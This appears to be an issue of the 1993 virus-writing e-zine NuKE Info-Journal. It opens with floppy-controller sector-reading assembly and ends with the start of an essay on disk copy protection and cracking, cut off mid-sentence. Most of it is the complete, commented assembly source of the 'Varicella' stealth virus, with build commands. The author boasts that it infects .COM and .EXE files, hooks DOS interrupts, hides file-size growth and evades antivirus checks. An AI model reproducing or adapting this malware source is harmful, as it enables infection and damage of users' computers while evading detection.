Dx,03F4H Keep_Trying: In Al,Dx Test Al,128 Jz Keep_Trying Inc Dx Mov Al,Ah Out Dx,Al RET Out_FDC EndP In_FDC Proc Near Mov Dx,03F4H Keep_Trying2: In Al,Dx Test Al,128 Jz Keep_Trying2 Inc Dx In Al,Dx Ret In_FDC EndP Motor_Delay Proc Mov Ah,15 ; Perform Seek Operation Call Out_FDC ; Out Mov Ah,2 ; Head&Drive Call Out_FDC ; Out Mov Ah,1 ; track# Call Out_FDC ; Call Wait_interrupt ; Ret Motor_Delay endp -------------------------------------------------------------------------------- ; The bellow is yet, another example for reading the first few beginning tracks ; but this one is for the Hard Disk ; By X ; Not `fully completed', but enough to get the point. Jmp TheCode Buffer Db 512 dup (0) ; For the sector StatusBuffer Db 7 Dup (7) ; For the status bytes TheCode Proc Near ReadSector: ; Turn ON the Motor Sti Mov Dx,03F2H Mov Al,00101101xB ; Set the Bits 0 , 2 ,3 , 4 Out Dx,Al ; Wait for motor to come to speed (1/2 second) Call Motor_Delay Mov Cx,2000 Loop $ ; Begin the initialization of DMA Chip Mov Al,46H ; Code for Read Data Out 11,Al ; Send Data Out 12,Al ; Now , Calculate buffer adress Lea Ax,Buffer ; Mov Bx,Ds ; Rol Bx,4 ; Push Bx ; And Bl,0FH ; Mov Dl,Bl ; Pop Bx ; Add Ax,Bx ; Jnc NoCarry ; Inc Dl ; NoCarry: ; Dec Al ; justify Out 4,Al ; Send Low Byte of address to the DMA controller Mov Al,Ah ; Out 4,Al ; Send High byte of the address // // // // Mov Al,Dl ; Out 81h,Al ; Send Page number (Page register) ; Finish initialization Mov Ax,511 ; Out 5,Al ; DMA controller Mov Al,Ah ; Out 5,Al ; Mov Al,2 ; Out 10,Al ; DMA controller ; Get pointer to disk base Mov Al,1EH ; Mov Ah,35H ; Int 021H ; ; Send read parametres. Mov Ah,066H ; Code for single sector read Call Out_Fdc ; Send It Mov Ah,0 ; Head&Drive # Call Out_FDC ; Send It Mov Ah,12 ; Track Number Call Out_FDC ; Send It Mov Ah,0 ; Head # Call Out_FDC ; Send It Mov Ah,3 ; Sector # Call Out_FDC ; Send it Mov Ah,Es:[Bx]+3 ; Sector Size code (2=512 bytes) Call Out_FDC ; Send it Mov Ah,Es:[Bx]+4 ; End-of-track # Call Out_FDC ; Send It Mov Ah,Es:[Bx]+5 ; Gap length Call Out_FDC ; Send it Mov Ah,Es:[Bx]+6 ; Datas length Call Out_FDC ; Send Call Wait_Interrupt ; Wait Int 6 ; Read the result bytes .. Mov Cx,7 Lea Bx,StatusBuffer Next: Call In_FDC Mov [BX],Al Inc Bx Loop Next ; Turn OFF the motor Mov Dx,03F2H Mov Al,12 Out Dx,Al Ret ; Exit from the programm Sector_REad Endp Wait_interrupt Proc ; Monitor the int 6 in bios status Byte Mov Ax,40H Mov Es,Ax Mov Bx,3EH Again: Mov Dl,Es:[BX] Test Dl,080H Jz Again And Al,127 Mov Es:[Bx],Dl Ret Wait_Interrupt EndP Out_FDC proc near Mov Dx,03F4H Keep_Trying: In Al,Dx Test Al,128 Jz Keep_Trying Inc Dx Mov Al,Ah Out Dx,Al RET Out_FDC EndP In_FDC Proc Near Mov Dx,03F4H Keep_Trying2: In Al,Dx Test Al,128 Jz Keep_Trying2 Inc Dx In Al,Dx Ret In_FDC EndP Motor_Delay Proc Mov Ah,15 ; Perform Seek Operation Call Out_FDC ; Out Mov Ah,0 ; Head&Drive Call Out_FDC ; Out Mov Ah,12 ; track# Call Out_FDC ; Call Wait_interrupt ; Ret Motor_Delay endp ================================================================================ =============================================================================== Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "The Varicella Virus Source Codes -N E- Nu -N uK Nu By KE uK Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu ahh, NuKE PoX viruses will never end... Well I noticed a few flaws and faults in code in the old NuKE PoX virus version 2.0, which I wanted to refine. This time I had a lot of time, and I _fully_ commented the source codes. % Improvements % The most major improvement is the infection routine, I have created a generic method that will always use the same infection/disinfection routine. If you remember NuKE PoX v2.0 you noticed that I copied whole blocks of the code twice, which gave the virus a size of 1800 Bytes! This version hovers at 1483 bytes, and it's far from tight, but it's EXTREMELY reliable! Meaning this baby should never crash for any reason. And it has _many_ added features that N-Pox v2.0 didn't have! % Introduction to the ideology of the Stealth Virus % Like the SVC viruses, this virus will `disinfect' on the fly. And to the DIMWIT that said SVC doesn't disinfect by rewriting the program on disk, GO CHECK YOUR INFO NITWIT. The SVC viruses will disinfect a file when opened, the SVC virus will actually remove the virus from the infected program. It will NOT attempt a disinfection in memory only! It does have the ability to do this to a certain extent, if you execute the file, and if you jump towards the end of the file by Int21h/4202h the SVC virus will fool DOS to think that the file is not infected, whereby it really is. But this method has a MAJOR flaw, one flaw is exercised by F-Prot anti-virus, to defeat this dumb method. The major flaw is that these viruses _cannot_ keep track of file pointers, it would take too much code to exercise this. So if you read a file from the beginning and read sequentially toward the end, surely enough you will encounter the SVC virus, because it does not have the ability to keep track of the file pointer. So in order to fix this, SVC will do a _real_ disinfection of the file on disk. Therefore in all aspects the file will look clean, as it _is_ clean! Also note, that the SVC viruses also infect System Device drivers, this is _rarely_ noted, maybe because people use VSUM as a reference? % Varicella Features % The virus will only infect .com and .exe generic files. I have removed the .ovl infections because of certain crashes that persist with certain large programs. No virus to date successfully does this for some reason. The virus will hide its file length by FCB directory method (Int21h/ah=11h,12h) and by File Handles method (Int21h/ah=4Eh,4Fh). The virus will disinfect the file on opens & extended opens via (Int21h/ah=3Fh,6Ch). The virus will also disinfect files as they are executed, (Int21h/ah=4Bh) and will later reinfect it when it has terminated. The virus will infect on closing (Int21h/ah=3Eh) and it uses the very sophisticated Job File Table method (The List of List). Infection is denoted by the seconds field will equal the day of the month! This method is _a lot_ better than having the seconds field to 60 or 62, because many AV programs flag on invalid seconds field. Therefore now the seconds field will be from a number 1->31 (Days in a month), and only with a 6% chance of an invalid second field stamp. Also in order not to create problems, the last two bytes of the virus _must_ be DBh,DBh. Therefore the virus uses TWO methods of detecting infection, because we wouldn't want to `disinfect' a file that isn't infected, so we must be 100% sure. I found it no use to have a `fake' disinfection routine, whereby it fakes a disinfection, for the reason that this method contains several flaws. And I found that testing this virus on my PC with a 40 Meg MFM 65ms drive, showed _very_ little signs of abnormality. So in speed wise, it's very fast, what is a 1-2 millisecond more, (1/100s of a second). When disinfecting a file, the virus even puts back the original seconds field time stamp, leaving absolutely no trace of its existence! How many viruses do that? huh? % To Come % Well I already have a multi-partition version of this virus, I'm currently tring to add NED polymorphic possibilities to this virus. This will be a nice task, as NED is variable in length, therefore I have to save the original file length, or I will fix NED to be constant in length. Nevertheless you should see it coming soon. % About the Name % Well I didn't want to call this N-Pox, because it has NO code similarities with N-Pox, the only thing they share is the method of going resident. But I called this "Varicella" because, Varicella is the medical term for (Chicken Pox) that adults get! When a child gets the Pox, you call it Chicken Pox, when an adult gets it, you call it Varicella! So I found it appropriate to call this Varicella because it is perhaps the `adult' or later out come of the N-Pox virus. ;================================================================= ; (c) NuKE Software Development 1991, 1992, 1993 ; ; VARICELLA VIRUS (Size 1483) ; ; By Rock Steady ; ; TASM VARICELL; ; TLINK/T VARICELL; ; virus_size equ last - init_virus ;virus size (bytes) mut1 equ 3 mut2 equ 1 mut3 equ 103h ;offset in memory seg_a segment byte public assume cs:seg_a,ds:seg_a org 100h ;compile to .com start: jmp init_virus ;------------------------------------------------------------------------------- init_virus: call doit_now ;begin virus doit_now: pop bp ;pop call offset sub bp,offset doit_now ;fix it with pointer push ax ;save registers push ds push es mov ax,0abcdh ;check if virus is int 13h ;alive in memory jmp next_code1 ;force jump virus_here: jmp exit_com ;error jump exit next_code1: cmp bx,0abcdh ;cmp bx if virus alive jnz install_virus jmp virus_here ;yes, skip memory part install_virus: push bx ;save registers push cx push dx push si push di push ds xor dx,dx ;0 value to dx mov ds,dx ;put that in ds les si,dword ptr ds:[0084h] ;get int21 vector mov word ptr cs:[int21][bp],si ;save int21 offset mov word ptr cs:[int21+2][bp],es ;save int21 segment les si,dword ptr ds:[0070h] ;get int1c vector mov word ptr cs:[int1c][bp],si ;save int1c offset mov word ptr cs:[int1c+2][bp],es ;save int1c segment les si,dword ptr ds:[004ch] ;get int13 vector mov word ptr cs:[int13][bp],si ;save int13 offset mov word ptr cs:[int13+2][bp],es ;save int13 segment pop ds ;DS=PSP (.exe only) push ds ;save DS mov ax,ds ;ds=cx dec ax ;dec cx, cx=mcb mov es,ax ;es=cx, mcb mov bx,es:mut1 ;bx=es:0003, mem size mov dx,virus_size ;dx=virus size (bytes) mov cl,4 shr dx,cl ;convert bytes to 16k add dx,4 ;paragraphs + 1 mov cx,es ;cx=psp segment sub bx,dx ;sub virus size from inc cx ;new mem address mov es,cx ;new segment mov ah,4ah ;set the block size int 21h jc exit_mem mov ah,48h dec dx ;alloc the mem mov bx,dx ;bx=# of para blocka int 21h jc exit_mem dec ax ;new segment add mov es,ax ;ax=es=mcb mov cx,8h ;DOS is the owner mov es:mut2,cx ;put it in mcb sub ax,0fh mov di,mut3 ;new offset to go mov es,ax ;es=segment mov si,bp ;add delta offset add si,offset init_virus ;begining of virus mov cx,virus_size ;our size push cs ;get the correct pop ds ;segment in ds cld ;clear direction to + repne movsb ;move us mov ds,cx ;ds=0000 cli ;disable ints mov word ptr ds:[0084h],offset int21_handler ;hook int21 mov word ptr ds:[0086h],es mov word ptr ds:[0070h],offset int1c_handler ;hook int1c mov word ptr ds:[0072h],es mov word ptr ds:[004ch],offset int13_handler ;hook int13 mov word ptr ds:[004eh],es sti ;enable ints exit_mem: pop ds ;restore 'em pop di pop si pop dx pop cx pop bx exit_com: cmp word ptr cs:[buffer][bp],5A4Dh ;.exe file? je exit_exe_file ;yupe exit exe file cmp word ptr cs:[buffer][bp],4D5Ah ;.exe file? je exit_exe_file ;yupe exit exe file push cs ;fix cs=ds for .com pop ds mov bx,offset buffer ;get first 3 bytes add bx,bp ;fix delta mov ax,[bx] ;move first 2 bytes mov word ptr ds:[100h],ax ;put em in the beginning inc bx ;inc pointer inc bx mov al,[bx] ;get last of 3rd byte mov byte ptr ds:[102h],al ;put that in place pop es pop ds pop word ptr cs:[ax_reg][bp] ;save ax else where mov ax,100h push ax ;fake a CALL & RETN mov ax,word ptr cs:[ax_reg][bp] ;put ax as normal retn ;link to 100h exit_exe_file: mov dx,ds ;get psp=ds seg add dx,10h ;add 16bytes to seg pop es pop ds pop ax add word ptr cs:[buffer+22][bp],dx ;fix segments add dx,word ptr cs:[buffer+14][bp] cli mov ss,dx ;restore ss mov sp,word ptr cs:[buffer+16][bp] ;and sp sti jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt. ax_reg dd 0 bp_reg dd 0 int13 dd 0 int1c dd 0 int21 dd 0 ;=============================================================================== ; Int 13h Handler ;=============================================================================== int13_handler: cmp ax,0abcdh ;virus test je int13_test ;yupe int13call: jmp dword ptr cs:[int13] ;original int13 int13_test: mov bx,ax ;fix iret ;=============================================================================== ; Int 1Ch Handler ;=============================================================================== int1c_handler: iret ;------------------------------------------------------------------------------- ; FCB Dir Stealth Routine (File Find) ;------------------------------------------------------------------------------- fcb_dir: call calldos21 ;get the fcb block test al,al ;test for error jnz fcb_out ;jmp if error push ax ;save registers push bx push cx push es mov ah,51h ;get current psp call calldos21 ;call int21 mov es,bx ;es=segment of psp cmp bx,es:[16h] ;psp of command.com? jnz fcb_out1 ;no, then jmp mov bx,dx ;ds:bx=fcb mov al,[bx] ;1st byte of fcb push ax ;save it mov ah,2fh ;get dta call calldos21 ;es:bx <- dta pop ax ;get first byte inc al ;al=ffh therefor al=ZR jnz fcb_old ;if != ZR jmp add bx,7h ;extended fcb here, +7 fcb_old: mov ax,es:[bx+17h] ;get file time stamp mov cx,es:[bx+19h] ;get file date stamp and ax,1fh ;unmask seconds field and cx,1fh ;unmask day of month xor ax,cx ;are they equal? jnz fcb_out1 ;nope, exit then sub word ptr es:[bx+1dh],virus_size ;sub away virus_size sbb word ptr es:[bx+1fh],0 ;sub with carry flag fcb_out1: pop es ;restore registers pop cx pop bx pop ax fcb_out: iret ;return control ;------------------------------------------------------------------------------- ; ASCIIZ Dir Stealth Routine (File Find) ;------------------------------------------------------------------------------- dta_dir: call calldos21 ;get results to dta jb dta_out ;if error, split push ax ;save register push bx push cx push es mov ah,2fh ;get current dta call calldos21 ;es:bx <- dta mov ax,es:[bx+16h] ;get file time stamp mov cx,es:[bx+18h] ;get file date stamp and ax,1fh ;unmask seconds field and cx,1fh ;unmask day of month xor ax,cx ;are they equal jnz dta_out1 ;nope, exit then sub word ptr es:[bx+1ah],virus_size ;sub away virus_size sbb word ptr es:[bx+1ch],0 ;sub with carry flag dta_out1: pop es ;restore registers pop cx pop bx pop ax dta_out: retf 0002h ;pop 2 words of stack ;=============================================================================== ; Int 21h Handler ;=============================================================================== int21_handler: cmp ah,11h ;FCB find first match je old_dir cmp ah,12h ;FCB find next match je old_dir cmp ah,4eh ;Find first match je new_dir cmp ah,4fh ;Find next match je new_dir cmp ah,3dh ;Opening a file je file_open cmp ah,6ch ;Ext_opening a file je file_ext_open cmp ah,3eh ;closing a file je file_close cmp ah,4bh ;Execution of a file je file_execute int21call: jmp dword ptr cs:[int21] ;original int21 old_dir: jmp fcb_dir ;fcb file find new_dir: jmp dta_dir ;new asciiz file find file_open: jmp open_file ;disinfect opening file file_ext_open: jmp open_ext_file ;disinfect opening file file_close: jmp close_file ;infect closing file file_execute: call check_extension ;check for ok ext cmp byte ptr cs:[com_ext],1 ;is it a com? je exec_disinfect ;yupe disinfect it cmp byte ptr cs:[exe_ext],1 ;is it a exe? je exec_disinfect ;yupe disinfect it jmp SHORT int21call exec_disinfect: call exec_disinfect1 ;Disinfect file mov word ptr cs:[ax_reg],dx pushf ;fake an int call dword ptr cs:[int21] ;call dos xchg word ptr cs:[ax_reg],dx ;restore dx mov byte ptr cs:[close],0 ;reset flag.. push ax ;store 'em push bx push cx push dx push si push di push es push ds closing_infect: mov ax,3524h ;get error handler call calldos21 ;call dos push es ;save es:bx= int_24 push bx ;error handler push ds ;ds:dx= asciiz string push dx push cs ;cs=ds pop ds mov dx,offset int21_handler ;hook error handler mov ax,2524h ;with our int24h call calldos21 pop dx ;restore ds:dx asciiz pop ds ;string cmp byte ptr cs:[close],0 ;Are we closing file? je exec_get_att ;nope, then jmp mov ax,word ptr cs:[handle] ;yupe, ax=file handle jmp exec_open_ok ;jmp so you don't open ;the file twice... exec_get_att: mov ax,4300h ;get file attribs call calldos21 ;call dos jnc exec_attrib ;no, error jmp jmp exec_exit2 ;ERROR - split exec_attrib: mov byte ptr cs:[attrib],cl test cl,1 ;check bit 0 (read_only) jz exec_attrib_ok ;if bit0=0 jmp dec cx ;else turn of bit_0 mov ax,4301h ;write new attribs call calldos21 ;call dos exec_attrib_ok: mov ax,3d02h ;open file for r/w call calldos21 ;call dos jnc exec_open_ok ;ok, no error jmp jmp exec_exit2 ;ERROR - split exec_open_ok: xchg bx,ax ;bx=file handler push cs ;cs=ds pop ds mov ax,5700h ;get file time/date call calldos21 ;call dos mov word ptr cs:[old_time],cx ;save file time mov word ptr cs:[org_time],cx mov word ptr cs:[old_date],dx ;save file date and cx,1fh ;unmask second field and dx,1fh ;unmask date field xor cx,dx ;are they equal? jnz exec_time_ok ;nope, file not infected jmp exec_exit3 ;FILE INFECTED exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits or word ptr cs:[old_time],dx ;seconds=day of month mov ax,4200h ;reset ptr to beginning xor cx,cx ;(as opened files may xor dx,dx ; have ptr anywhere, call calldos21 ; so be smart!) mov word ptr cs:[marker],0DBDBh ;File Infection marker mov dx,offset ds:[buffer] ;ds:dx buffer mov cx,18h ;read 18h bytes mov ah,3fh ;read from handle call calldos21 ;call dos jc exec_exit1 ;error? if yes jmp sub cx,ax ;did we read 18h bytes? jnz exec_exit1 ;if no exit mov dx,cx ;cx=0 dx=0 mov ax,4202h ;jmp to EOF call calldos21 ;call dos jc exec_exit1 ;error? exit if so. mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz mov word ptr cs:[filesize],dx ;save upper 16bit fileSz call chkbuf ;check if .exe jz exec_cool ;jmp if .exe file cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k? jb exec_cool ;if less jmp! exec_exit1: jmp exec_exit3 ;exit! exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning mov cx,virus_size ;cx=virus size mov ah,40h ;write to handle call calldos21 ;call dos jc exec_exit1 ;error? if yes exit sub cx,ax ;cx=ax bytes? jnz exec_exit1 ;not equal exit mov dx,cx ;cx=0 dx=0 mov ax,4200h ;jmp to top of file call calldos21 ;call dos jc exec_exit1 ;error, then exit mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize call chkbuf ;check if .exe jnz exec_com_file ;if !=.exe jmp mov dx,word ptr cs:[filesize] ;get upper 16bit mov cx,4 ;cx=0004 mov si,word ptr cs:[buffer+8] ;get exe header size shl si,cl ;mul by 16 sub ax,si ;exe_header - filesize sbb dx,0h ;sub with carry mov cx,10h ;cx=0010 div cx ;ax=length in para ;dx=remaider mov word ptr cs:[buffer+20],dx ;New IP offset address mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs) add dx,virus_size+100h ;Dx=virus_size+256 mov word ptr cs:[buffer+16],dx ;New SP entry mov word ptr cs:[buffer+14],ax ;New SS (in para) add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para mov ax,word ptr cs:[buffer+10] ;ax=min para needed cmp ax,word ptr cs:[buffer+12] ;cmp with max para jb exec_size_ok ;jmp if ok! mov word ptr cs:[buffer+12],ax ;nop, enter new max exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size add ax,virus_size ;add virus to it push ax ;push it and ah,1 ; mov word ptr cs:[buffer+2],ax ;restore new value pop ax ;pop ax mov cl,9 ; shr ax,cl ; add word ptr cs:[buffer+4],ax ;enter fileSz + header mov dx,offset buffer ;ds:dx=new exe header mov cx,18h ;cx=18h bytes to write jmp SHORT exec_write_it ;jmp... exec_com_file: sub ax,3 ;sub 3 for jmp address mov word ptr cs:[buffer+1],ax ;store new jmp value mov byte ptr cs:[buffer],0E9h ;E9h=JMP mov dx,offset buffer ;ds:dx=buffer mov cx,3 ;cx=3 bytes exec_write_it: mov ah,40h ;write to file handle call calldos21 ;call dos mov dx,word ptr cs:[old_date] ;restore old date mov cx,word ptr cs:[old_time] ;restore old time mov ax,5701h ;write back to file call calldos21 ;call dos exec_exit3: mov ah,3eh ;close file call calldos21 ;call dos exec_exit2: pop dx ;restore es:bx (the pop ds ;original int_24) mov ax,2524h ;put back to place call calldos21 ;call dos pop ds pop es pop di ;pop registers pop si pop dx xor cx,cx mov cl,byte ptr cs:[attrib] ;get old file attrib mov ax,4301h ;put them back call calldos21 ;call dos pop cx pop bx pop ax cmp byte ptr cs:[close],0 ;get called by exec? je exec_good_bye ;yep, then jmp iret ;else exit now. exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx iret ;iret ;------------------------------------------------------------------------------- ; Close File Int21h/ah=3Eh ;------------------------------------------------------------------------------- close_file: cmp bx,4h ;file handler > 4? ja close_cont ;jmp if above jmp int21call ;else exit close_cont: push ax ;save 'em push bx push cx push dx push si push di push es push ds push bx ;save file handler mov ax,1220h ;get job file table! int 2fh ;call multiplex ;es:di=JFT for handler mov ax,1216h ;get system file table mov bl,es:[di] ;bl=SFT entry int 2fh ;call multiplex pop bx ;save file handler add di,0011h mov byte ptr es:[di-0fh],02h ;set to read/write add di,0017h cmp word ptr es:[di],'OC' ;check for .COM file jne closing_next_try ;no try next ext cmp byte ptr es:[di+2h],'M' ;check last letter je closing_cunt3 ;no, file no good, exit closing_exit: jmp closing_nogood ;exit closing_next_try: cmp word ptr es:[di],'XE' ;check for .EXE file jne closing_exit ;no, exit cmp byte ptr es:[di+2h],'E' ;check last letter jne closing_exit ;no, exit closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag mov word ptr cs:[handle],bx ;save handler jmp closing_infect ;infect file! closing_nogood: pop ds ;restore 'em pop es pop di pop si pop dx pop cx pop bx pop ax jmp int21call ;good bye, baby... ;------------------------------------------------------------------------------- ; Execute Disinfecting routine ;------------------------------------------------------------------------------- exec_disinfect1 PROC push ax ;save registers push bx push cx push dx push ds mov ax,4300h ;get file attribs call calldos21 ;call dos test cl,1h ;is Read-only flag? jz okay_dis ;no, jmp attribs ok dec cx ;turn off bit 0 mov ax,4301h ;write new attribs call calldos21 ;call dos jnc okay_dis ;No error? then jmp jmp end_dis ;error? exit! okay_dis: mov ax,3d02h ;open file for r/w call calldos21 ;call dos jnc dis_fileopen ;No error? then jmp jmp end_dis ;Error? exit! dis_fileopen: xchg bx,ax ;bx=file handle mov ax,5700h ;get file time/date call calldos21 ;call dos mov word ptr cs:[old_time],cx ;save file time mov word ptr cs:[old_date],dx ;save file date and cx,1fh ;unmask second field and dx,1fh ;unmask date field xor cx,dx ;are they equal? jnz half_way ;nope, file not infected mov ax,4202h ;jmp to EOF xor cx,cx ;cx=0 xor dx,dx ;dx=0 call calldos21 ;call dos push cs ;cs=ds pop ds ; mov cx,dx ;dx:ax=file size mov dx,ax ;save to cx:dx push cx ;save upper fileSz push dx ;save lower fileSz sub dx,1Ch ;filesize-1C=origin byte sbb cx,0 ;sub with carry mov ax,4200h ;position ptr call calldos21 ;call dos mov ah,3fh ;open file mov cx,1Ch ;read last 1Ch bytes mov dx,offset org_time ;put in ds:dx call calldos21 ;call dos call chkbuf ;Did it work? je half ;Yes,Jmp cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected? je half ;Yes, then jmp pop dx pop cx half_way: jmp end_dis1 ;exit, error! half: xor cx,cx ;cx=0 xor dx,dx ;dx=0 mov ax,4200h ;pointer to top of file call calldos21 ;call dos mov ah,40h ;write function mov dx,offset buffer ;ds:dx=buffer mov cx,18h ;cx=18h bytes to write call chkbuf ;check if .exe? jz SHORT dis_exe_jmp ;yupe, jmp mov cx,3h ;else write 3 bytes dis_exe_jmp: call calldos21 ;call dos pop dx ;pop original fileSz pop cx sub dx,virus_size ;Sub with virus_size sbb cx,0 ;sub with carry mov ax,4200h ;ptr top of virus call calldos21 ;call dos mov ah,40h ;write function xor cx,cx ;write 0 bytes call calldos21 ;call dos! (new EOF) mov cx,word ptr ds:[org_time] ;get original time mov dx,word ptr ds:[old_date] ;get original date mov ax,5701h ;put back to file call calldos21 ;call dos end_dis1: mov ah,3eh ;close file handle call calldos21 ;call dos end_dis: pop ds ;restore values pop dx pop cx pop bx pop ax ret exec_disinfect1 ENDP ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=6ch ;------------------------------------------------------------------------------- open_ext_file: push dx ;save DX mov dx,si ;asciiz=DS:DX now jmp open_ext ;jmp ;------------------------------------------------------------------------------- ; Open File by DOS Int21h/ah=3Dh ;------------------------------------------------------------------------------- open_file: push dx ;save dx (asciiz) open_ext: call check_extension ;check extension cmp byte ptr cs:[com_ext],1 ;is it a .com? je open_ok_ext ;yep, then jmp cmp byte ptr cs:[exe_ext],1 ;is it a .exe? je open_ok_ext ;yep, them jmp jmp open_exit ;ext no good, exit! open_ok_ext: call exec_disinfect1 ;disinfect file! open_exit: pop dx ;restore dx jmp int21call ;exit to dos... ;------------------------------------------------------------------------------- ; Checks Buffer (EXE) Header ;------------------------------------------------------------------------------- chkbuf PROC push si ;save register mov si,word ptr cs:[buffer] ;get first word cmp si,5A4Dh ;si=ZM? je chkbuf_ok ;if yes exit cmp si,4D5Ah ;si=MZ? chkbuf_ok: pop si ;pop register ret chkbuf ENDP ;------------------------------------------------------------------------------- ; Check file Extension ;------------------------------------------------------------------------------- check_extension PROC pushf ;save flags push cx ;save cx,si push si mov si,dx ;ds:[si]=asciiz mov cx,128 ;scan 128 bytes max mov byte ptr cs:[com_ext],0 ;reset .com flag mov byte ptr cs:[exe_ext],0 ;reset .exe flag check_ext: cmp byte ptr ds:[si],2Eh ;scan for "." je check_ext1 ;jmp if found inc si ;else inc and loop loop check_ext ;loop me check_ext1: inc si ;inc asciiz ptr cmp word ptr ds:[si],'OC' ;is it .COM jne check_ext2 ; ~~ cmp byte ptr ds:[si+2],'M' ;is it .COM je com_file_ext ; ~ check_ext2: cmp word ptr ds:[si],'oc' ;is it .com jne check_ext3 ; ~~ cmp byte ptr ds:[si+2],'m' ;is it .com je com_file_ext ; ~ check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE jne check_ext4 ; ~~ cmp byte ptr ds:[si+2],'E' ;is it .EXE je exe_file_ext ; ~ check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe jne check_ext_exit ; ~~ cmp byte ptr ds:[si+2],'e' ;is it .exe je exe_file_ext ; ~ jmp check_ext_exit ;neither exit com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file jmp SHORT check_ext_exit ;jmp short exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file check_ext_exit: pop si ;restore pop cx popf ;save flags ret com_ext db 0 ;flag on=.com file exe_ext db 0 ;flag on=.exe file check_extension ENDP ;------------------------------------------------------------------------------- ; Original Int21h ;------------------------------------------------------------------------------- calldos21 PROC pushf ;fake int call call dword ptr cs:[int21] ;call original int_21 ret calldos21 ENDP ;=============================================================================== ; Int 24h Handler ;=============================================================================== int24_handler: mov al,3 ;don't report error... iret ;later dude... ;------------------------------------------------------------------------------- ; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS close db 0 ;closing file ;------------------------------------------------------------------------------- ; END - END - END - END - END - END - END flags dw 0 ;Flags are saved here attrib db 0 ;file's attrib filesize dd 0 ;filesize handle dw 0 ;file handler old_date dw 0 ;file date old_time dw 0 ;file time org_time dw 0 ;original file time ;------------------------------------------------------------------------------- buffer db 0CDh,020h ; 0 (0) EXE file signature db 090h,090h ; 2 (2) Length of file db 090h,090h ; 4 (4) Size of file + header (512k) db 090h,090h ; 6 (6) # of relocation items db 090h,090h ; 8 (8) Size of header (16byte para) db 090h,090h ; A (10) Min para needed (16byte) db 090h,090h ; C (12) Max para needed (16byte) db 090h,090h ; E (14) SS reg from start in para. db 090h,090h ; 10(16) SP reg at entry db 090h,090h ; 12(18) checksum db 090h,090h ; 14(20) IP reg at entry db 090h,090h ; 16(22) CS reg from start in para. Marker db 0DBh,0DBh ; Marks THIS File as INFECTED! last: seg_a ends end start ================================================================================ =============================================================================== Volume 1, Issue 6, May 1993 NuKE Info-Journal #6 NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE uK E- KE "The Arms Race on Disk-Based Protection -N E- Methods : Round One" Nu -N uK Nu By KE uK Rock Steady E- KE -N E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu % The `Arms Race' on Disk-Based Copy Protection Methods : Round One % Disk-based techniques of protecting software have existed since the early days of microcomputers. The very first microcomputers used cassette tapes to store programs and data. (Remember the C-64s old days?) The first mass- market microcomputer to use disk drives instead of cassette tapes was the Apple-II in 1978. Its great popularity was largely due to its reliable and inexpensive disk drive system, devised by Steve Wozniak. The disks, much faster and more convenient than cassettes, in turn made it practical to run large and complex programs. Disks became standard equipment on all but the cheapest microcomputers. The tremendous success of the IBM PC microcomputer in the early 1980s confirmed this trend. The history of disk-based protection methods and the of efforts to defeat them, resembles an escalating arms race, and hence the name. Early, elementary protection techniques were countered by skilled users, some did it for their own convenience, others for the intellectual challenge. And hence, the arms race began. The `guerrillas' of the arms race were the `software hackers': mission; to device a method for removing `cracking' the copy-protection of each new program marketed, and who then distributed the copy-able version to their friends, who passed it on, and so on. I have witnessed and was quite an active member of this arms race, the intellectual challenge was the main reason of my membership. During the years I have come upon several protection techniques some I was able to easily bypass, and others that brought upon great challenge. Slowly I began noting the several methods of disk-based copy-protection, and I also did acquire several documents on other disk-based copy-protection, and today you will read upon this very interesting concept of disk-based copy-protection. Some methods were quite frightening as it tried to perform dangerous disk- access techniques. Some methods were quite trivial, others were loops and flaws of the disk structures, and how the disk controller reacts. All the methods I was able to collect are documented bellow, a lot of time and effort was put into this, I do hope you appreciate it. % Disk Format % The early generation of disk protection methods depended on technical details of the diskette and disk drives. To describe the methods, it is first necessary to outline the structure of a formatted floppy. For convenience I will only use the IBM PC 5.25 inch disk, formatted by the popular PC-DOS or MS-DOS. Information is stored on the disk in a series of circles, called `tracks'. In a normal 5.25 double density disk you have 40 series of circles, aka tracks. Tracks are numbered from 0, being the outermost track, to 39 being the inner- most. Each track is divided into 9 arcs, called `sectors', numbered from 0-8. Each sector consists of an `address field', which identifies the sector, and a `data field', which contains the data stored in that sector. Both fields contain a prologue, data, a checksum and an epilogue, of the information stored in that field. Therefore, in reality DOS does NOT make the total number of possible bytes available for your data storing. In a 5.25 DSDD (double sided, double density) disk there really is a possible of 500k where only 360k is available for you. In a 5.25 DSHD (double sided, high density) disk, there is 1.6 Megs, but only 1.2 Megs is available to you. In a 3.5 DSDD disk, there is 1 Meg, but 720k is available for you. In a 3.5 DSDD disk, there is an amazing 2.0 Megs but only 1.44Megs is available to you. The same applies for hard drives, ever buy a HD and it says 120 Megs, but when you format it, you only get 114 Megs? Its because of DOS, there are some programs that enable you to use this space and get rid of the address field, that is present before _every_ sector. One popular program is called "MAXI - Form" by Herne Data Systems Ltd. This program allows 360k floppy to hold 420k, 720k -> 810k, 1.2M -> 1.44M, 1.44M -> 1.66M. Maxi CANNOT make use of ALL the possible number of bytes, because we MUST reserve some space for the Boot Sector, 2 copies of the FAT and the DIR Structures. However it does rid the address 